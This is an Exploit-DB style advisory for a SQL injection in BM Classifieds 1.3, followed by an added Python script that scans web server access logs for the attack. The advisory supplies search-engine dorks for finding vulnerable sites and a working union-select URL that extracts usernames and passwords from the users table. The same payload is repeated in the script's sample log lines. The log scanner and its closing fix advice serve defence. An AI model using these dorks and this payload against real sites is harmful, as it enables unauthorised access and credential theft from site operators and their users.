BM Classifieds Ads - SQL Injection

EDB-ID: 10314
CVE: N/A
Platform: PHP
Date: 2009-12-04


###############################

                                                  ALGERIAN HACKER
   **********************- NORTH-AFRICA SECURITY TEAM -***********************

  [!]            BM Classifieds ads SQL injection vulnerability
  [!] Author    : Dr.0rYX & Cr3w-DZ
  [!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

  ***************************************************************************/

  [ Software Information ]

  [+] Vendor : http://www.bmscripts.com/
  [+] script   : powered by BM Classifieds
  [+] Demo : http://classifieds.bmscripts.com/
  [+] Version() : 1.3
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"classifieds.php?cat="
               inurl::"showad.php?listingid="

  **************************************************************************/
  [ Vulnerable File ]

  http://server/classifieds.php?cat=[N.A.S.T ]

  [ Exploit ]

  http://server/classifieds.php?cat=144+union+select+username,password,3,4+from+users

  [ Greets ]

  [+] :xcv-dz , CLAW , kader11000 ,le0n , exploit-db.com , ALL HACKERS MUSLIMS
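
For defenders reviewing web server logs for this issue, the following added example (not part of the original advisory or of BM Classifieds) flags requests where the `cat` or `listingid` parameter named above is not a plain integer. It assumes combined-format access logs and that both parameters are numeric IDs; the function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> parameter pairs named in the advisory. Treating both as plain
# integer IDs is an assumption (the advisory's sample value is cat=144).
NUMERIC_PARAMS = {"classifieds.php": "cat", "showad.php": "listingid"}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
INTEGER_RE = re.compile(r"[0-9]{1,10}")


def suspicious_requests(log_lines):
    """Return (line_no, param, decoded_value) for every non-integer ID value."""
    findings = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = NUMERIC_PARAMS.get(script)
        if param is None:
            continue
        # parse_qs decodes %xx and turns '+' into a space, so encoded
        # payloads are checked in their decoded form.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not INTEGER_RE.fullmatch(value):
                findings.append((line_no, param, value))
    return findings


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Dec/2009:10:00:01 +0000] "GET /classifieds.php?cat=144 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Dec/2009:10:00:05 +0000] "GET /classifieds.php?cat=144+union+select+username,password,3,4+from+users HTTP/1.1" 200 6011',
    '192.0.2.10 - - [04/Dec/2009:10:00:09 +0000] "GET /showad.php?listingid=12 HTTP/1.1" 200 3300',
    '198.51.100.7 - - [04/Dec/2009:10:00:12 +0000] "GET /showad.php?listingid=12%27 HTTP/1.1" 500 410',
    '192.0.2.10 - - [04/Dec/2009:10:00:15 +0000] "GET /index.php?cat=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line_no, param, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: {param}={value!r}")
```

The same integer-only check, applied server-side before the value reaches the query (together with parameterized statements), is the corresponding fix.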